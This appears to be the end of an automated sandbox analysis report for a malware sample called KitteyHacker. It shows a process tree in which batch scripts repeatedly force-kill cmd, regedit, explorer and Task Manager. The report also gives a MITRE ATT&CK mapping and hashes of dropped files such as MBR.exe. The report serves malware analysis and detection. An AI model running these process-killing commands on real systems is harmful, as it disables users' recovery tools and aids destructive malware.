        shutdown.exe -a
        6⤵
        
        PID:2592
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2612
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2800
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2880
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2764
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2052
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1656
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1740
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2064
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1852
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2848
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2348
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:2596
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1280
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:936
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2696
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:2340
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1152
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:300
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2704
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:916
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1472
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2804
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2452
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1716
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2896
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1844
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2600
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:1508
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1676
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2116
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2016
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        Kills process with taskkill
        
        PID:1940
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1684
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2152
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2748
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2040
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2668
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1488
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1492
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1388
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2548
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:3036
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2796
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2500
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2916
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:628
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2260
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        Kills process with taskkill
        
        PID:2868
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2720
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1396
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1648
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1556
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1784
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1060
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:1584
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2876
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:1792
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2628
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2592
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1700
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2988
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2132
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2564
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1720
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:644
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:108
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2300
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1560
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:2848
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:896
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1764
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2348
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1092
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1280
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:792
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1320
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:836
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2392
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:932
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:760
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2580
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2804
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2892
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:336
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:964
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2896
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:848
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1984
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1676
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2560
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:1964
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:1416
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:2772
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:740
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:872
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:2712
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2344
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:1488
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1944
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:1236
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:2840
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2856
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:1664
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:1536
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM explorer.exe"
        5⤵
        
        PID:2204
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM explorer.exe
        6⤵
        
        PID:1628
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM taskmgr.exe"
        5⤵
        
        PID:2280
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM taskmgr.exe
        6⤵
        
        PID:2708
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "shutdown.exe -a"
        5⤵
        
        PID:1868
      - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown.exe -a
        6⤵
        
        PID:2832
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM cmd.exe"
        5⤵
        
        PID:844
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM cmd.exe
        6⤵
        
        PID:2168
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "TASKKILL /F /IM regedit.exe"
        5⤵
        
        PID:3048
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /F /IM regedit.exe
        6⤵
        
        PID:2964

C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2244

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17441581-821497535-159044428555734497218541515211916664343-7936279201888566367"
1⤵
PID:2476

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3623470522137321894-518073333-1488032539-636014957-1701409747-15311980771893257261"
1⤵
PID:1788

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-274410608-1545979686-108213426876345728936169881380138531-495459939-2092858959"
1⤵
PID:1552

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "296032338-1533747871553167304728020474771289758127157065368457575-1864519173"
1⤵
PID:2988

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-166541488513762454281756658203323865171-1656402153-320989686-214028950471732546"
1⤵
PID:1656

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "131056282564392298-605880604147265107927691757-20590219562022853471565270680"
1⤵
PID:1368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "682591168-123649278420585190683562389661599708478-1297474184-1414914339707407366"
1⤵
PID:2016

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "47771346220738067151031462922-140505397915964611901718755738-275020864-637965934"
1⤵
PID:2124

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "833222572-1579670584-475317457339307578-9613901771141729959-2025542799-1610047216"
1⤵
PID:3012

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4046397221490623226-440451892214385259270204809-9571255231920476496290883637"
1⤵
PID:2132

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "865410446-34250717117859955671027609673-728141098-184079961611394058-1257659762"
1⤵
PID:1336

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1345386805101254388339506880494451481-5633698044526609859334788381462426471"
1⤵
PID:888

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1136003782774926393159442618124458949021087473511548987014-13995199951463773883"
1⤵
PID:2276

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1150072278211898877610704562842035188989-1383169697-410087571-1936846321-1126797456"
1⤵
PID:2180

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1449761114-5481087047244270432096392234-1521670420-1486227143-9967593791817008287"
1⤵
PID:2264

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19557015441493786863467013108-18154627662591927951736864781920484426807022905"
1⤵
PID:2632

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-997132538-504131724394826582-602220782970605442288133402397121666-2100712567"
1⤵
PID:2660

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1850137379127491968510920499591494981569-106063020470898122-545175743260795428"
1⤵
PID:1032

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-173814753666740787112436545381045228546-1620574886-1340401193335858822080759362"
1⤵
PID:400

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "609629069-4420437641767339336-211481954-154712572528807816015420242901071655320"
1⤵
PID:2848

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-800812134-1190497163-196327126918917244-1809339544-362529695-1733159263-258924910"
1⤵
PID:984

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "540216501-1019870349548916347-171346824836989460-4714070911009872440710299797"
1⤵
PID:1848

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "391584879-1599905740-2011942584-764958226-1424314120-1951011089753698541946635556"
1⤵
PID:2152

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1841728274-2792295665149076-2098290275-403866231272568916-17762795951035110703"
1⤵
PID:1664

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1861020129-103913138939556826-1009967875-11495119611484283678-13175101411218706096"
1⤵
PID:1592

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1459354488-1563877426-8425636211320616406-1494892183-18091455761846399352-282403517"
1⤵
PID:2916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-633510019-211902154192450061219114177111585862885-1430914246-1435437202-1523122861"
1⤵
PID:2884

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "772607337-578500177167826373021860723457995-1392932462258445877-488126744"
1⤵
PID:2764

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1976326423-1460786142-17218746665590784842117556354285689128-1333224073-485282288"
1⤵
PID:1504

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7866678651533562613-20896946382046540556-447718228-1314553374-1961282416-1634360628"
1⤵
PID:1320

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1778930236-700652960115616511606389114-1960184434-1258257566-1070778587-222933816"
1⤵
PID:336

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1543380362-187389773729395502007661080-437639276-55990715311919854931298980288"
1⤵
PID:1844

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-708318326904869225-727937258-107963231718851894241404051857-72974175401642179"
1⤵
PID:2360

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1395990474-122320512752167299-17713304492100441385460783224-3222017141597999204"
1⤵
PID:2608

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9061462621071669328-86012473503402162-6755487191737698639513177473810199"
1⤵
PID:2188

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-146015382550728352510165071861011789159508545491-1406871207-920896057-684314668"
1⤵
PID:2856

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "700509192-685650634-1744933054-1417010272172070920-87593903-1606608511-1322566845"
1⤵
PID:1660

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1652327350-1688422687-14463318-187131735-1498878990-5580612571091202976-1153571728"
1⤵
PID:2516

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1219930140-7856285741862921277686868545-876393308946394059-1990914380-661307313"
1⤵
PID:2460

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-540809471214656553618043850534818892809406347721133387080610909590-1733921510"
1⤵
PID:2852

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1227447764-769763718-181256407311951060391787605776-1699956225-19897099131453196916"
1⤵
PID:2656

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1390003473-1032219442-1226539411694020404-406814942-3761137461729257886-894556221"
1⤵
PID:2784

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "676531280-1526951172060731120-3231565163601167181712488901719850670-2041091417"
1⤵
PID:2144

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "566806200499684246-212022986-1698493816-79915723-8916337261627116961-513880986"
1⤵
PID:2520

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1956277769885701194-1683280562-1525332489-7856260165869653017566087651837225997"
1⤵
PID:1624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "607987663-31709848012483930491008813008-13776325711285477891-1052693176-1141942836"
1⤵
PID:1300

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1675066587-1060934948-1458710337-194517078511796113931346487379-10974275891060222441"
1⤵
PID:1208

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1836141655-973183740-2569065411230030041610792140-9811129891189237003-1743859363"
1⤵
PID:2428

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1096421220-125235548-181583251434297786-12712432661417745161-1249571217-1612573530"
1⤵
PID:1504

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-147493954610297372096850242181847417088127977691812398212-20648887521711604278"
1⤵
PID:1384

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1216443906778861266-503425776-16587603082041503082-339497341393712402591599669"
1⤵
PID:2864

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1375251548-1795993567-1424174537-8519234286912832714254570721976021748-1501841281"
1⤵
PID:2096

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-279168454-10293297461714202663-17999086059508543043889394281437354951-402603034"
1⤵
PID:1204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2062356820-1391605445554555188128177260214920898728069087720206408752066057063"
1⤵
PID:1520

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1955194211-653129394351915872254625492-1361154759-1122243005982075181936919945"
1⤵
PID:2648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WEWWZC8O\KitteyHacker[1].exe

Filesize
29.2MB

MD5
e1e384b5ec6d898e813dfb671f6d4489

SHA1
0ae4051554555faff2f330d6487d17a939027e94

SHA256
d5618bfa36e823c688ce8aae3b0462b51dd96b076291991da755768f0c177b05

SHA512
be3ffbb728f119d9159d0527d18e9889a406e9c48aca04ea72c5dbac0bcfd12157de3c0d365be56006fca99bb10a1fcf2629272bd6d9d7ebaa5291edd184619e

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\B0AA.bat

Filesize
11KB

MD5
b7a328520d4363afd3cbb8ba50ead6d5

SHA1
5a29ad845f63fa670577c89afaeeb34e9fe032c2

SHA256
a8cbd116c09512885ccaccd7efc41772542fa071ac0a032927a07ae93457b683

SHA512
16c89c7ef563caaa4b507414e871a9d62b7b5a3ef33a182ff2b519dacaa3445000389bfa586e1c977107ff7b4bb1adac11e3a7a1c57e8ef927bf89ef7b82710c

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\KHD.exe

Filesize
70KB

MD5
5e85416ac8975e649a325ffb114f18cb

SHA1
ff47cbe62cbb5a87c9b9aa67e58af7aac0d716cb

SHA256
7eb960ca0917a2f6366006d73c213c69ccdc269fb790510bbd93be75bab7468c

SHA512
e0b8a73ef39a62919df0f8c268cbce614ae13f959fdec10630595d23b1770132cdb83f62304f6518c14c7118e9b2ebbe762df722da9d246c06d101279dc69098

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\KitteyHacker.exe

Filesize
11.2MB

MD5
06b3640b85125af27bf4b92f3c129c8c

SHA1
3e6de220cf589f9b23e4bb61e2d4791b7b2fe27c

SHA256
061b19d4fa64ab86c7c1803d604e2c3d783ba05883cc82b12c9ce9a7fa612cca

SHA512
64cd7290f066156101916ce50fdf31483a5327f8e3c21c18459b8db7736d01bef93960ef66604de34901b2d7db7d6191edc0e793ccbb27dd5a4a82e9df3c093e

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\KitteyHacker.exe

Filesize
11.2MB

MD5
06b3640b85125af27bf4b92f3c129c8c

SHA1
3e6de220cf589f9b23e4bb61e2d4791b7b2fe27c

SHA256
061b19d4fa64ab86c7c1803d604e2c3d783ba05883cc82b12c9ce9a7fa612cca

SHA512
64cd7290f066156101916ce50fdf31483a5327f8e3c21c18459b8db7736d01bef93960ef66604de34901b2d7db7d6191edc0e793ccbb27dd5a4a82e9df3c093e

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\KitteyHacker.mp3

Filesize
2.8MB

MD5
e2122883a3413608fe5b64fbd9017f9e

SHA1
e67c5fb0265914e46ee6b7bd0e8eda4d17eea85f

SHA256
65f1866d5a345a199890f28281c27f3e109980af5b536eef3d72d50cb20decbc

SHA512
0af8086c3fcf2f6ff4f4d59f428e49fab1fdc75f7f7a0b1bc8bc60fb9fdd299eb2d7c92f5f44c513c27fc85ac96cfe6db6e10fd232276d1402373795815be781

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\Kitty.mp3

Filesize
1.8MB

MD5
fec06f68e4994afdb678d0702617ddc5

SHA1
8748c25ca9773df70b80556887fb0d5f232fc43e

SHA256
30a83dfb77f2aed05fed9edf0bc1a3866abf402184b0fa7d70e04ef5101c9156

SHA512
a8f047e74804173595e8d6121bbea6c27524fbd397559f4c8c5e57edffe6cc91749f5bf76cebb454e58a11971fe09b956fa8eecbd5f710a824d3ac16ab718e08

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\MBR.exe

Filesize
390KB

MD5
f11bd64fef20c74c6fb9996cd24a511b

SHA1
f593f2239616ed73a142b4852cf89b37a1437d5b

SHA256
c7dc9a3605392bb0cacf3bdcb03c533e6dd1fd5294f6957bcdfd550ac424499b

SHA512
52c0c2571a11f9bedfac27e5c13d31175704330d7a13ea51b5012dd19cd415b5fe9ecb0e8727060482638288800bed91130a390502222b2b3f29c30e04beab2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\Protogent.mp3

Filesize
4.2MB

MD5
894c91f51dd0638286caac00fdb74f57

SHA1
e1e0918efeb7fcf72423db51cc203e0805873823

SHA256
2141c116ab724160b9daadb88e583a316c1b340490b45aad8cba47e1140b779a

SHA512
c420d48a62a4a2948d93084db87bed38741d557634d578f9a5d3751b734f61efc7247351383005ee4f015bc68befdc5b172230ae3158bfa9a3b414d8a6cae008

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\SM.exe

Filesize
1.1MB

MD5
ec514dc25cda916bb9269504523061d5

SHA1
955acd5fe35c1064cf4723471880d1cbb34b3738

SHA256
9794204a5aaf3298d309568924fc32a9862a1892e69b4d01e78918ea0586711a

SHA512
9c8e0dae1e8eca6f3fd93fbd558f36e42cd2431da04844a97bfece4204a7a2f38f6a72ce82c32406e8699710820413dd1e12c8567b315d989ef2437a90939720

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\ext\php_squall.dll

Filesize
126KB

MD5
6ff84bc8812b8c079fa6de68cf36ab59

SHA1
ca8789bbd7b0193221f9518e6b2f5b319c32b717

SHA256
7587e29919a56b6f94675e49208e1ae908bcab09363734d846502c3b4ad54326

SHA512
5ef9d9c1038b055186147cbfcfbedf54d6ecc235468ef4968630eb03368cf2c3f39dd600f1ebf9ecfe9b7cc134235b01a983a4fe9b6f292775244f837ec2e81f

Download Submit
